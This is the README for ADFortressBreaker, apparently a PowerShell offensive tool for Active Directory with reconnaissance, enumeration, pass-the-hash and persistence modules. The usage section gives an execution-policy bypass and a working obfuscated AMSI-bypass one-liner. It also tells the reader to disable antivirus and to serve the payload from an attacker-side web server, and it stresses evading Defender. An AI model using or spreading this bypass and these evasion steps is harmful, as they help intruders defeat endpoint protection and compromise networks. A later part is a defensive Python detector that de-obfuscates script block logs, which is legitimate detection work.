Powershell script that aims to simplify Penetration Testing operations in the Windows Active Directory environment. Designed and developed by @synackid and @m4rkh4ck

m4rkh4ck/ADFortressBreaker

ADFortressBreaker

About ADFortressBreaker

The script was written to help ethical hackers run the most common commands of a penetration test in an Active Directory environment without writing a single line of code. It is designed to leave as few traces as possible, so all modules are loaded directly into memory to avoid interception by Defender. Remember that all the modules inside the Modules folder will trigger your antivirus, so before using the script you have to disable real-time monitoring or add an exclusion for the path where you will use it.

Usage

Before launching ADFortressBreaker, it is necessary to bypass the PowerShell execution policy:

powershell -ep bypass

Then you have to bypass the AMSI control:

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Import the module:

. .\ADFortressBreaker.ps1

Execute:

Invoke-ADFortressBreaker

After that, the user has to start a web server on port 8000 on their machine.

           _____  ______         _                     ____                 _
     /\   |  __ \|  ____|       | |                   |  _ \               | |
    /  \  | |  | | |__ ___  _ __| |_ _ __ ___  ___ ___| |_) |_ __ ___  __ _| | _____ _ __
   / /\ \ | |  | |  __/ _ \| '__| __| '__/ _ \/ __/ __|  _ <| '__/ _ \/ _ | |/ / _ \ '__|
  / ____ \| |__| | | | (_) | |  | |_| | |  __/\__ \__ \ |_) | | |  __/ (_| |   <  __/ |
 /_/    \_\_____/|_|  \___/|_|   \__|_|  \___||___/___/____/|_|  \___|\__,_|_|\_\___|_|


1) Reconnaissance
2) Enumeration
3) PassTheHash
4) Persistence
5) Exit


[*] Start a web server on your machine (exposed on port 8000) to download the .ps1 file

[*} Example: python3 -m http.server

[*] Set the web server ip address :

In the main menu the user can choose the activity to do by typing the corresponding number and pressing enter.
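
For defenders: the obfuscated AMSI step in Usage still resolves to fixed reflection targets, so script text can be matched after normalization. The Python sketch below is an added example, not part of ADFortressBreaker; its function names and log entries are constructed for illustration, and it assumes the input is script text collected by PowerShell script block logging.

```python
import re

# Reflection targets the Usage one-liner resolves to once de-obfuscated (lower-cased).
INDICATORS = ("amsiutils", "amsiinitfailed")

CONCAT = re.compile(r"'\s*\+\s*'")  # 'Am'+'si' -> 'Amsi'
ARG = r"\(?\s*'[^']*'\s*\)?"        # one -f argument, optionally parenthesized
FORMAT = re.compile(r'"((?:\{\d+\})+)"\s*-f\s*(' + ARG + r"(?:\s*,\s*" + ARG + r")*)", re.I)


def _expand_format(match):
    """Evaluate a "{1}{0}" -f 'b','a' expression the way PowerShell would."""
    args = re.findall(r"'([^']*)'", match.group(2))
    try:
        return "'" + "".join(args[int(i)] for i in re.findall(r"\d+", match.group(1))) + "'"
    except IndexError:
        return match.group(0)  # malformed expression: leave it untouched


def normalize(script_text):
    """Undo backtick, string-concatenation and -f format-operator obfuscation."""
    text = script_text.replace("`", "")
    text = CONCAT.sub("", text)
    return FORMAT.sub(_expand_format, text)


def find_amsi_tampering(script_text):
    """Return the indicators present in a script block after normalization."""
    lowered = normalize(script_text).lower()
    return [name for name in INDICATORS if name in lowered]


# Constructed script-block log entries (event ID 4104). The first is benign; the other
# two wrap expressions taken from the Usage one-liner in constructed assignments.
SAMPLE_BLOCKS = [
    "Get-ADUser -Filter * | Select-Object Name",
    r'''$t = ( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') )''',
    r'''$f = "g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ) )''',
]

if __name__ == "__main__":
    for block in SAMPLE_BLOCKS:
        print(find_amsi_tampering(block) or "clean", "<-", block[:60])
```

A plain substring search for either indicator misses both obfuscated entries; the match only appears after the three normalization passes.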

Credits

To implement ADFortressBreaker we used the following tools:

License

This project is licensed under the Commons Clause version of the MIT License. You can copy, modify, distribute and perform the work for whatever reason, excluding commercial purposes.
